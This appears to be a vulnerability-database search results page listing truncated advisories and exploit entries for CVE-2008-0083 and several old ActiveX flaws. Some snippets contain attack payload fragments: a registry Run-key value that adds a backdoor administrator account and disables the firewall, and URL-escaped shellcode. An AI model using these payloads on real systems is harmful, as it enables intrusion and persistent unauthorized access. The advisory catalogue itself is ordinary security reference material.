1197 matches found
CVE-2008-0083
The 1 VBScript VBScript.dll and 2 JScript JScript.dll scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors...
CVE-2008-0083
CVE-2008-0083 affects Microsoft VBScript/JScript scripting engines (VBScript.dll and JScript.dll) version 5.1 and 5.6 used in Windows 2000 SP4, XP SP2, and Server 2003 SP1/SP2. A vulnerability in decoding scripts in Web pages and in memory loading could allow remote code execution through unknown...
Microsoft Windows VBScript / JScript buffer overflow
Buffer overflow on scripts parsing...
Microsoft Windows Scripting Engines Script Encoding Code Execution (MS08-022; CVE-2008-0083)
VBScript stands for Microsoft Visual Basic Scripting Edition that includes Web client scripting in Microsoft Internet Explorer and Web server scripting in Microsoft Internet Information Service. JScript is the Microsoft implementation of the ECMA 262 language specification ECMAScript Edition 3. T...
Microsoft VBScript and JScript Scripting Engines Remote Code Execution Vulnerability
Description Microsoft VBScript and JScript are prone to a remote code-execution vulnerability because they fail to adequately handle user-supplied input. Attackers can leverage this issue by enticing an unsuspecting user to view a malicious web document. Successful exploits would allow arbitrary...
Microsoft Security Bulletin MS08-022 – Critical Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
Microsoft Security Bulletin MS08-022 – Critical Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution 944338 Published: April 8, 2008 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability in the...
MS08-022: Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
The remote host is running a version of Windows that contains a flaw in JScript. An attacker may be able to execute arbitrary code on the remote host by constructing a malicious JScript and enticing a victim to visit a web site or view a specially crafted email message. C Tenable Network Security...
Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods
------------------------------------------------------------------------------------ Data Dynamics ActiveBar ActiveX Control Actbar3.ocx 3.2 Multiple Inscure Methods url: http://www.datadynamics.com author: shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org This was writte...
chilkathttp-overwrite.txt
-------------------------------------------------------------------- ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite url: www.chilkatsoft.com Author: shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk...
Chilkat HTTP ChilkatHttp.dll ActiveX控件不安全调用漏洞
BUGTRAQ ID: 28546 Chilkat HTTP是用于与服务器通讯的HTTP客户端组件。 Chilkat HTTP组件的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞非授权访问系统上的文件。 Chilkat HTTP组件的ChilkatHttp.ChilkatHttp.1和ChilkatHttp.ChilkatHttpRequest.1 ActiveX控件(ChilkatHttp.dll)没有正确地验证对SaveLastError方式的输入参数,如果用户受骗访问了恶意网页的话,就可能导致覆盖并破坏系统上的任意文件。 Chilkat Software...
EB Design Pty Ltd - EBCRYPT.dll 2.0 Multiple Remote Vulnerabilities
EB Design Pty Ltd - EBCRYPT.dll 2.0 Multiple Remote Vulnerabilities ----------------------------------------------------------------------------- EB Design Pty Ltd EBCRYPT.DLL v.2.0 Multiple Remote Vulnerabilites url: http://www.ebcrypt.com/ Author: shinnai mail: shinnaiatautisticidotorg site:...
Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download
----------------------------------------------------------------------------- Yahoo! Messenger 8.1.0.421 CYFT Object ft60.dll Arbitrary File Download url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe Author: shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org This was...
mw6-overwrite.txt
----------------------------------------------------------------------------- MW6 Technologies QRCode ActiveX 3.0 MW6QRCode.dll Remote File Overwrite url: www.mw6tech.com Author: shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org This was written for educational purpose. U...
HP ActiveX (hpqutil.dll ListFiles hpqutil.dll) Remote Heap Overflow PoC
No description provided by source. :. GOODFELLAS Security Research TEAM .: :. http://goodfellas.shellcode.com.ar .: ActiveX hpqutil!ListFiles hpqutil.dll - Remote heap overflow. ============================================================= Internal ID: VULWAR200706041 introduction ------------...
Microsoft MFC Library - CFileFind::FindFile Buffer Overflow
source: https://www.securityfocus.com/bid/25697/info The CFileFind::FindFile method in the MFC library for Microsoft Windows is prone to a buffer-overflow vulnerability because the method fails to perform adequate boundary checks of user-supplied input. Successfully exploiting this issue may allo...
Tencent QQ scene vulnerability to the hack of the law-vulnerability and early warning-the black bar safety net
According to analysys international released the 2 0 0 7 in the first 2 quarters of China im market quarterly monitoring report shows, Chinese active IM software account has reached 3. 7 6 million, which has 2. 9 million active user accounts for Tencent QQ is well deserved IM the king. But did yo...
Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)
----------------------------------------------------------------------------------------------------------- 0-day: Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library FPOLE.OCX v. 6.0.8450.0 Remote Stack Overflow url: http://www.microsoft.com author: shinnai mail: shinnaiatautisticidotorg site:...
Telecom Italy Alice Messenger - Remote Registry Key Manipulation
group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config...
Telecom Italy Alice Messenger - Remote Registry Key Manipulation
Telecom Italy Alice Messenger - Remote Registry Key Manipulation group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config...
postcast-overflow.txt
'open calc.exe scode = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%...